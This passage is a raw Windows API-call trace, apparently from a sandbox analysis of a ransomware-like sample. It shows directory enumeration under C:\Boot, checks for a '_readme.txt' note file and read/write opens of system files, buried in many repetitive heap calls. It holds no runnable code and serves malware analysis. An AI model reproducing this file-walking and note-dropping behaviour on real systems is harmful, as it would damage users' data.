RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b18 [0146.699] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.699] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.699] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.699] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.699] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.700] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.700] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.700] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0146.700] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.700] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.700] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.700] PathFindFileNameW (pszPath="") returned="" [0146.700] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.700] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.700] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.700] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.700] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.701] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.701] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.701] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.701] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0146.701] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.701] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0146.701] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.701] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.701] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.701] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.701] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.701] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0146.701] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.702] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea61310, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.702] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.702] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.702] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned=".txt" [0146.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.702] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea61310, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.702] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.702] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.702] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.702] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.702] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.702] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.702] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.702] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.703] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.703] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.704] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.704] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.705] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.705] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.706] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.706] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.707] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.707] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.708] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 